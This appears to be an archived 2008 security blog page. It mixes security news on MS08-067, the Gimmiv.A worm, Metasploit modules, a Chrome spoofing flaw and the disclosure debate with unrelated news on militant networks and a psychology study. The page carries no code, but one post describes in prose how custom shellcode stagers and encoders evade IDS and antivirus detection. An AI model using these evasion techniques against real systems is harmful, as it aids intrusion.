Howard acknowledged that parts of Microsoft's SDL process, specifically the fuzz tests thrown at the affected code, had failed. But he was generally upbeat about how well SDL did its job.

"At the end of the day, I'm not unhappy with how SDL performed," he said. "We have two goals. One is to reduce the number of vulnerabilities, and the second is to reduce the severity of those we miss. You're never going to get everything. Windows Vista and [Windows] Server 2008 [users] were protected; SDL reduced the seriousness of the vulnerability for them.

"So I think SDL did succeed here," Howard said.

ICANN Terminates Agreement with EstDomains

ICANN has terminated EstDomains, Inc. as an accreditation registrar.

Tuesday, October 28, 2008

Al-Qaida's Route Though Syria Persists

Via AP -

For years, he operated along Syria's remote border where donkeys are the only means of travel. He provided young Arabs from as far away as Morocco and the Persian Gulf with passports, guides and weapons as they slipped into Iraq to wage war.

But recently, the Iraqi man known as Abu Ghadiyah began doing even more — launching his own armed forays into his homeland, U.S. and Iraqi officials say.

Finally the United States lashed out, frustrated it says, after years of vainly pressuring Syria to shut down his network supplying the Sunni insurgency.

The Americans carried out a bold daylight raid Sunday in a dusty farming community of mud and concrete houses known as Abu Kamal, just across the border in Syria. The U.S. says Abu Ghadiyah and several bodyguards were killed. Syria says eight civilians died. At least one villager says U.S. forces seized two men and hauled them away.

Whatever Abu Ghadiyah's fate, the attack targeting him has become a seminal moment — casting rare light on the hidden, complex networks that recruit foreign fighters and then deliver them across Syria to the battlefields of Iraq.

Syria has long insisted it monitors the border and does all it can to stop weapons and fighters.

"They know full well that we stand against al-Qaida," Syrian Foreign Minister Walid al-Moallem said Monday in London. "They know full well we are trying to tighten our border with Iraq."

But the raid and U.S. documents — recently made public — indicate that insurgents operating in the Syrian border region are still providing the materiel that enables suicide attacks, bombings and ambushes to continue inside Iraq.

Even as the insurgency has fallen on rough times — battered and bleeding but not yet defeated — the networks themselves have become more organized, the documents indicate. That raises fears the insurgency could someday arise anew.

The documents also shed light on the murky web of religious extremists, professional smugglers and corrupt Syrian intelligence officials who run the smuggling networks — some of whom view Syria's government in faraway Damascus with contempt.

Until the raid, Abu Ghadiyah, whose real name was Badran Turki al-Mazidih, was mostly unknown outside a tight circle of Western and Iraqi intelligence officers. They tracked his movements, and the al-Qaida commanders who relied on his services, believing him a senior figure in al-Qaida in Iraq.

Abu Ghadiyah housed his recruits both in Damascus and the Syrian port of Latakiya before moving them across the Iraqi border, one senior Iraqi security officer said Tuesday. He spoke on condition of anonymity because he was not authorized to talk to media.

Scores of people are involved in the smuggling networks, officials say. But Iraqi police held special disdain for Abu Ghadiyah, a native of the northern Iraqi city of Mosul believed to be in his early 30s.

Last May, Abu Ghadiyah led a dozen gunmen across the border and attacked an Iraqi police station in Qaim, killing 12 policemen, Iraqi police Lt. Col. Falah al-Dulaimi told The Associated Press on Tuesday. Syrian border guards prevented an Iraqi patrol from pursuing the gunmen back into Syria, the police officer said.

Sunday's raid was launched because of intelligence that Abu Ghadiyah was planning another attack inside Iraq, a senior U.S. official told The Associated Press, also speaking anonymously because the information is classified.

Much of the publicly known information about networks such as Abu Ghadiyah's comes from documents seized during a U.S. military raid last year on a suspected al-Qaida hideout in the Iraqi city of Sinjar.

Those documents include records of about 590 foreign volunteers who entered Iraq from Syria, according to the Combating Terrorism Center at the U.S. Military Academy at West Point. The center released a report last July based largely on the documents.

According to the documents, nearly 100 Syrian coordinators are involved in transporting foreign fighters through Syria. Some are professional smugglers apparently hired by al-Qaida in purely business deals. Others are motivated by al-Qaida's hardline Islamic ideology.

Abu Ghadiyah's real beliefs are unclear, but a U.S. Treasury document says he was appointed as al-Qaida in Iraq's logistics chief for Syria by the group's founder, Abu Musab al-Zarqawi. That suggests Abu Ghadiyah was indeed a true believer.


There may be plenty of others to take Abu Ghadiyah's place, the U.S. says — including a brother Akram, and a cousin Ghazi Fezza al-Mazidih, whom the U.S. described in a February report as his "right hand man."

Overall, the number of foreign fighters attracted to Iraq may be down, the West Point study cautioned, "But the logistical network to move them has become more organized."

Custom Shellcode and Return-2-Libc on Mac OS X

After some time without any updates coming up, this article will show some techniques and strategies to improve reliability of exploit code in Mac OS X Tiger and Leopard (up to 10.5.5). Specifically, we will look at a technique to aid loading of stager shellcode and evading non-executable stack restrictions. This was hinted at the "OS X Exploits and Defense" book (Elsevier), chapter 7, which I wrote earlier this year (co-authored the book with Kevin Finisterre).

Ideally, when shellcode size restrictions exist, and possibly in almost any situation where subtle and discreet operation is required, you should never use a standard or publicly available shellcode, like the usual so-called "bind shell" or "reverse shell". Not only they are identified by IDS vendors but they will also fail when certain constraints are present. In addition, a combination of stubs (splitting functionality in small dock-able shellcodes) with an encoder will defeat most packet inspectors and signature-based detection products (for example, antivirus engines).


Bigs up to HD Moore for the link...

Microsoft Issues Security Patch for Pre-Beta Windows 7

Via CNet -

Microsoft released a security patch on Monday for software that won't be available publicly until Tuesday at the company's Professional Developer Conference.

Microsoft will be providing attendees of PDC 2008 on Tuesday with a pre-beta version of Windows 7, the successor to Windows Vista.

"A security issue has been identified that could allow an authenticated remote attacker to compromise your Microsoft Windows-based system and gain control over it," the security update says.

The more than 6,000 attendees who will be walking away from the sold-out event with the Windows 7 operating system software in hand could have been vulnerable to an attacker exploiting the security hole.

"The code that will be distributed at PDC for Windows 7 was put on CD before last week's security update was developed, so it will not contain the update," a Microsoft spokeswoman wrote in an e-mail request for comment. "However, when users install the pre-beta bits, they will be prompted to get the update from Windows Update, just like other Windows customers."

The security patch has been available since Wednesday. The critical security hole also affects Windows 2000, Windows XP, and Windows Server 2003.

Student Charged After Alerting Principal to Server Hack

Via The Register UK -

A 15-year-old high school student in New York State has been charged with three felonies after he allegedly accessed personnel records on his school's poorly configured computer network and then notified his principal of the security weakness.

The unnamed student of Shenendehowa Central School was charged Thursday with computer trespass, unlawful possession of a personal identification information and identity theft, according to news reports. He has been suspended from school and ordered to stand charges in family court in Saratoga County.

He and a peer allegedly gained access to file containing the personal information of 250 workers because of a district-wide error in setting up a new server. After accessing the information, he sent an email alerting the principal to the breach and signed it "A student." With the help of the district's IT department, the principal identified the boy as the culprit.

"The kid committed an intentional criminal act," state trooper Maureen Tuffey told The Times Union. "He deceitfully used someone else's name and password so he would not get caught and was looking to profit from his criminal act."

All that was needed to access the information was a district password. School officials have admitted that thousands of students, faculty and employees could have accessed the same file for up to two weeks. The file contained the social security numbers, driver's license numbers and home addresses of past and present employees, most of whom were bus drivers.

Since news of the charges were reported late last week, hackers have criticized administrators for turning the student into a scapegoat for the school board's shoddy computer security. We're inclined to agree, although it'd be nice if we knew more about the specifics the the email the fellow sent his principal. Additional coverage is available here and here.

New Microsoft MS08-067 Advisory + New Metasploit Modules

Microsoft is aware that detailed exploit code demonstrating code execution has been published on the Internet for the vulnerability that is addressed by security update MS08-067. This exploit code demonstrates code execution on Windows 2000, Windows XP, and Windows Server 2003. Microsoft is aware of limited, targeted active attacks that use this exploit code. At this time, there are no self-replicating attacks associated with this vulnerability. Microsoft has activated its Software Security Incident Response Process (SSIRP) and is continuing to investigate this issue.

Our investigation of this exploit code has verified that it does not affect customers who have installed the updates detailed in MS08-067 on their computers. Microsoft continues to recommend that customers apply the updates to the affected products by enabling the Automatic Updates feature in Windows.


Microsoft seems to confirm that idea that the piece of malware being called Gimmiv.A was the malware used in these observed limited, targeted attacks.

On the MSF front, HD Moore added the first real MS08-067 Metasploit module just about 6 hours ago. It currently supports XP SP2/SP3 + DEP and Windows 2003 SP0/SP1 without DEP, more targets soon...

Monday, October 27, 2008

ATF Foils Neo-Nazi Mass Murder Plot

Via (AP) -

Federal agents have broken up a plot to assassinate Democratic presidential candidate Barack Obama and shoot or decapitate 102 black people in a Tennessee murder spree, ATF officials said today.

In court records unsealed today, federal agents said they disrupted plans to rob a gun store and target a predominantly African-American high school by two neo-Nazi skinheads. Agents said the skinheads did not identify the school by name.

Jim Cavanaugh, special agent in charge of the Nashville field office for the Bureau of Alcohol, Tobacco, Firearms and Explosives, said the two men planned to shoot 88 black people and decapitate another 14. The numbers 88 and 14 are symbolic in the white supremacist community.

The men also sought to go on a national killing spree, with Obama as its final target, Cavanaugh told The Associated Press.

“They said that would be their last, final act — that they would attempt to kill Sen. Obama,” Cavanaugh said. “They didn’t believe they would be able to do it, but that they would get killed trying.”

Iranian General Reports Arming 'Liberation Armies'

Via Yahoo! News (AP) -

TEHRAN, Iran – Iran is supplying weapons to "liberation armies" in the Middle East, a top Revolutionary Guards commander said, offering the first official confirmation the country provides weapons to armed groups in the region.

Gen. Hossein Hamedani, deputy commander of a volunteer militia that is part of the elite Revolutionary Guards, did not provide specific details in the report on the state-run Borna news. The U.S. military has accused Iran of arming Shiite militias in Iraq, and Iran is widely believed to provide weapons to Lebanon's militant Shiite Hezbollah group.

"Not only are our armed forces self-sufficient, liberation armies of the region get part of their weapons from us," Hamedani said, according to the report on Borna's Web site late Sunday.

In the past, Iran — a majority Shiite country — has denied arming Hezbollah, saying it only provided political and financial support. The Iranian government has also denied providing weapons or financial support to Shiite militants fighting U.S. forces in Iraq.

But the U.S. military has said it has evidence that elements of the Mahdi army, an Iraqi militia loyal to anti-American Shiite cleric Muqtada al-Sadr, have been armed by Iran.

Hamedani also said Iran has no shortage of advanced missile systems.

"Our chemical engineers have upgraded Iran's missile capability," he was quoted as saying.

Hamedani didn't elaborate, but Iranian officials have said they successfully tested a solid fuel motor for the medium-range Shahab-3 ballistic missile, a technological breakthrough for Iran.

Experts say solid fuel increases the accuracy of missiles in reaching targets. But many in the West have expressed doubt about Iran's professed military accomplishments.

Iran launched an arms development program during its 1980-88 war with Iraq to compensate for a U.S. weapons embargo. Since 1992, Iran has produced its own tanks, armored personnel carriers, missiles and a fighter plane.

Hamas is Looking for a Few Good Hackers to Hack into Israeli Websites

Via LA Times -

The Tehran office of a Palestinian political group has announced it is offering cash prizes for any intrepid computer whiz who hacks into a "Zionist" website.

For the second year in a row, the representatives of Hamas in the Islamic Republic area holding a contest to encourage techies to break into the websites of hard-line Israeli political organizations such as Shas or Hagana, according to a report published in Tabnak, a Farsi-language news website.

Winners will receive cash prizes equivalent to about $2,000.

Hamas announced the competition at a media expo now underway in Tehran.

Contest organizers describe the hack-Zionist-websites-for-cash competition as a "peaceful and non-violent initiative."

It's also a bit of tit for tat. A group of Israeli hackers recently boasted of breaking into a Hamas website and uploading the Israeli national anthem onto it.

Hamas accused Israelis of breaking into one of their websites some years ago and diverting traffic to a pornography site, called "Hot Motel Horny Sex Sluts."

Observers noted that the contest gives a chance for Iran's many under-employed but tech-savvy computer geeks to earn some quick cash with their expertise.

Debunking Google's Security Vulnerability Disclosure Propaganda

Via CNET -

Question: You're a multi-billion dollar tech giant, you've launched a new phone platform after much media fanfare. Then, a security researcher finds a flaw in your product within days of its release. Worse, the vulnerability is due to the fact that you shipped old (and known to be flawed) software on the phones. What should you do? Issue an emergency update, warn users, or perhaps even issue a recall? If you're Google, the answer is simple -- attack the researcher.

With the news of a flaw in Google's Android phone platform making the New York Times on Friday, the search-giant quickly ramped up the spin machine. After first dismissing the amount of damage to which the flaw exposed users, anonymous Google executives then attempted to discredit the security researcher, Charlie Miller, a former NSA employee turned security consultant. Miller, the unnamed Googlers argued, acted irresponsibly by going to the New York Times to announce his vulnerability, instead of giving the Big G a few weeks or months to fix the flaw:

Google executives said they believed that Mr. Miller had violated an unwritten code between companies and researchers that is intended to give companies time to fix problems before they are publicized.

What the Googlers are talking about is the idea of "responsible disclosure," one method of disclosing security vulnerabilities in software products. While it is an approach that is frequently followed by researchers, it is not the only method available, and in spite of the wishes of the companies whose products are frequently analyzed, it is by no means the "norm" for the industry.

Another frequently used method is that of "full disclosure" -- in which a researcher will post complete details of a vulnerability to a public forum (typically a mailing list dedicated to security topics). This approach is often used by researchers when they have discovered a flaw in a product made by a company with a poor track record of working with researchers -- or worse, threatening to sue them. For example, some researchers refuse to provide Apple with any advanced notification, due to its past behavior.

A third method involves selling information on the vulnerabilities to third parties (such Tippingpoint and iDefense) -- who pass that information on to their own customers, or perhaps keep it for themselves. Charlie Miller, the man who discovered the Android flaw has followed this path in the past, most notably when he sold details of a flaw in the Linux Kernel to the US National Security Agency for $50,000 (pdf).

First, consider the fact that security is a two-sided coin. If Google wants researchers to come to it first with vulnerability information, it is only fair to expect that Google be forthcoming with the community (and the general public) once the flaw has been fixed. Google's approach in this area is that of total secrecy -- not acknowledging flaws, and certainly not notifying users that a vulnerability existed or has been fixed. Google's CIO admitted as much in a 2007 interview with the Wall Street Journal:

Regarding security-flaw disclosure, Mr. Merrill says Google hasn't provided much because consumers, its primary users to date, often aren't tech-savvy enough to understand security bulletins and find them "distracting and confusing." Also, because fixes Google makes on its servers are invisible to the user, notification hasn't seemed necessary, he says.

Second, companies do not have a right to expect "responsible disclosure." It is a mutual compromise, where the researchers provide the company with advanced notification in exchange for some form of assurance that the company will act reasonably, keep the lines of communication open, and give the researcher full credit once the vulnerability is fixed.

Google's track record in this area leaves much to be desired. Many top tier researchers have not been credited for disclosing flaws, and in some cases, Google has repeatedly dragged its feet in fixing flaws. The end result is that many frustrated researchers have opted to follow the full disclosure path, after hitting a brick wall when trying to provide Google with advanced notice.

I can personally confirm this experience, after I discovered a fairly significant flaw in a number of commercial Firefox toolbars back in 2007. While Mozilla and Yahoo replied to my initial email within a day or so, and kept the lines of communication open, Google repeatedly stonewalled me, and I didn't hear anything from them for weeks at a time. Eventually, Google fixed the flaw a day or two after I went public with the vulnerability, 45 days after I had originally given the company private notice. As a result, I have extreme sympathy for those in the research community who have written Google off.


The Android platform is built on top of over 80 open source libraries and programs. This particular flaw had been known about for some time and already fixed in the current version of the open source libraries. The flaw in Google's product only exists because the company shipped out-of-date software, which was known to be vulnerable.


We saw the same thing in Google Chrome, which was built using an older and vulnerable version of WebKit. Utilizing open-source components and libraries is a dual-edge sword - at best.

Just look at IBM, HP, Apple and the hundreds of appliance vendors as perfect examples. All of these vendors regularly have to retro-patch open-source fixes (OpenSSH, PHP, Apache, OpenSSL, etc) back into their customized products. But we all know, some are quicker than others...

Austin's World Record Breaking Thriller Dance

Via Original Alamo Blog -

On October 25, 881 people gathered at the Long Center in Austin, Texas to attempt to break the Guinness World record for the largest synchronized Thriller dance. The old record was 140 people. Consider that record to be... shattered.

The record was witnessed by Mayor Will Wynn and Austin City Council Member Sheryl Cole.

Thrill the World Austin was executed by Alamo Drafthouse, Rude Mechanicals, Flash Mob Austin and sponsored by Mosaic | 5619, Mexic-Arte Museum, Ballet Austin, 6th Street Austin, the Long Center and the Capital Area Food Bank.

Check out the encore performace of Austin's Thrill the World Team in the Day of the Dead procession down Sixth Street on November 1st. Complete details on Thrill the World can be found on the official website,


Check the link above for the video...freaking awesome. Only in Austin ;)

Only a minor correction, but the old record was 147 dancers and was set in August 2008, by a group of school kids in the UK.

I mean, it was kinda unfair...we have Pirates Protesting Zombie Rights to March in Austin. Needless to say the major groundwork was done, just need to get enough people to stop working for the 5 mins. heeh

New Address Spoofing Flaw Smudges Google's Chrome

Via The Register UK -

Google's Chrome browser has been marred by yet another vulnerability, this one allowing attackers to impersonate websites of groups like the Better Business Bureau, PayPal or, well, Google.

Researcher Liu Die Yu of the TopsecTianRongXin research lab in Beijing says the spoofing vulnerability is the result of faulty code inserted by programmers from the Mountain View, California search behemoth.

"I don't see Apple Safari vulnerable in the same way," he writes in an email to The Register. "They share the same engine(webkit)."

As his proof of concept demonstrates, it is in fact possible to send Chrome users to a page under his control while causing the browser's address bar to display the domain name

A Google representative says Chrome's spoofing vulnerability is a "known issue" that will be fixed in an update that will be pushed to end users soon. Those too impatient to wait can download version of Chrome on Google's Dev Channel.

Minor Update on Gimmiv.A (MS08-067) Worm

Via -

It was quite clear that something strange was happening when everyone read the announcement of a out-of-band patch release from Microsoft. Usually Microsoft is quite rigorous when releasing patches and updates on the second Tuesday of the month. This out of the ordinary update has left lot of people wondering why it was needed.

Then, after Microsoft released security bulletin MS08-067 and the relative update KB958644, everything became more clear. A critical vulnerably has been detected in the Windows Server service, when handling RPC requests. A critical hole similar to the one used by older Blaster and Sasser worms, an hole that could have opened doors for the return of Worms (with capital W).

Why did Microsoft release this update in such a hurry? It's easily explained. Sure, it's a dangerous vulnerability, but the matter is that it has been used by some malware for targeted attacks.

After the exploit has been discovered, Microsoft decided to release an out-of-band update.

This vulnerability is present all Microsoft Windows operating systems starting from Windows 2000 (2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista SP1, Server 2008). Ironically, even Microsoft's new operating system Windows 7 pre-beta is vulnerable and needed an update.

On all operating systems prior to Windows Vista (so, Windows 2008 and Windows 7 are excluded) the vulnerability allows the execution of arbitrary code remotely. On Windows Vista and further, the attack must be run from an authenticated user.


On a side note, Gimmiv.A looks like a test build. Its code is not optimized, redundant and there are lots of debug output strings. These are all details that could mean this malware was intended as a beta or debug release, to use for targeted attacks but still not fully tested.


That last paragraph is new to me, I haven't heard that from other vendors that released information on the worm. If they did, then I have missed it up to now.

It makes sense however.

When the vulnerability was released, I figured we had a good week before a reliable public exploit was created (perhaps RCE'd from the patch itself) and some kid threw it in a worm framework. I knew vulnerability researching would be working on it in short order, but I also knew that the likelihood of them releasing a worm from was small. But a worm was released almost the same day as the patch...which was a bit unexpected in my book.

This can only mean that someone had this worm...and that they were sitting on it (or had used it as part of the original targeted attacks). Once they saw the cat was out of the bag, they released it to the world to make noise and cover their work. Hence, the unpolished debug code.

If you haven't patched, do it now....

Science Says We Really Are What We Drink

Via Time Health & Science -

And now for some helpful scientific advice: When that IRS agent comes to your office to conduct an audit, offer him a cup of coffee. And when you're sitting down to do your holiday shopping online, make sure you're cradling a large glass of iced tea. The physical sensation of warmth encourages emotional warmth, while a chilly drink in hand serves as a brake on rash decisions — those are the practical lesson being drawn from recent research by two Yale-educated psychologists, published last week in Science magazine.

Encountering warmth or cold lights up the insula — a walnut-sized section of the brain — says John A. Bargh, a professor of psychology at Yale, who co-authored the paper with Lawrence E. Williams of the University of Colorado who received his Ph.D. from Yale earlier this year. And the insula is the same part of the brain engaged when we evaluate who we can trust in economic transactions, Bargh says.

Psychologists have known since the mid 1940s that one person's perceptions of another's "warmth" is a powerful determining factor in social relationships. Judging someone to be either "warm" or "cold" is a primary consideration, even trumping evidence that a "cold" person may be more competent. Much of this is rooted in very early childhood experiences, Bargh argues, when infants' conceptual sense of the world around them is shaped by physical sensations, particularly warmth and coldness. Classic studies by Harry Harlow, published in 1958, showed monkeys preferred to stay close to a cloth surrogate mother rather than one made of wire, even when the wire "mother" carried a food bottle. Harlow's work and subsequent studies have led psychologists to stress the need for warm physical contact from caregivers to help young children grow into healthy adults with normal social skills.

Feelings of "warmth" and "coolness" in social judgments appears to be universal. Although no comprehensive worldwide study has been done, Bargh says that describing people as "warm" or "cold" is common to many cultures, and studies have found those perceptions influence judgment in dozens of countries. To test the relationship between physical and psychological warmth, the researchers conducted two experiments. The first involved a group of 41 undergraduates who were taken by elevator to a fourth floor room. During the ride, a research assistant who was unaware of the study's hypotheses, handed the test subject either a hot cup of coffee, or a cold drink, to hold while the researcher filled out a short information form on a clipboard. The drink was then handed back. When the subjects arrived at the testing room, they were presented with a personality profile describing "Person A" and asked to rate that person's personality traits. Those who had briefly held the warm drink assessed Person A as warmer than test subjects who had held the iced drink.

"We are grounded in our physical experiences even when we think abstractly," says Bargh.

In a second experiment, done under the guise of a product-evaluation test, participants were asked to hold heated or frozen packs used to treat muscle aches. They were then told they could receive a gift certificate for a friend, or a gift for themselves. Those who held the hot pack proved to be more likely to ask for the gift certificate for a friend, while those who held the frozen pack tended to keep the gift.

"It appears that the effect of physical temperature is not just on how we see others, it affects our own behavior as well," Bargh said. "Physical warmth can make us see others as warmer people, but also cause us to be warmer — more generous and trusting — as well."

The practical advice Bargh takes away from the study is that important decisions are best taken with a cold drink in hand, because that part of the brain that triggers caution in economic and trust decisions is stimulated by cold sensation. Conversely, if you are planning on introducing your fiancee to mom and dad, pass on the icy martinis in that air-conditioned, glass and steel restaurant; do it over a mug of hot chocolate in front of a roaring fire.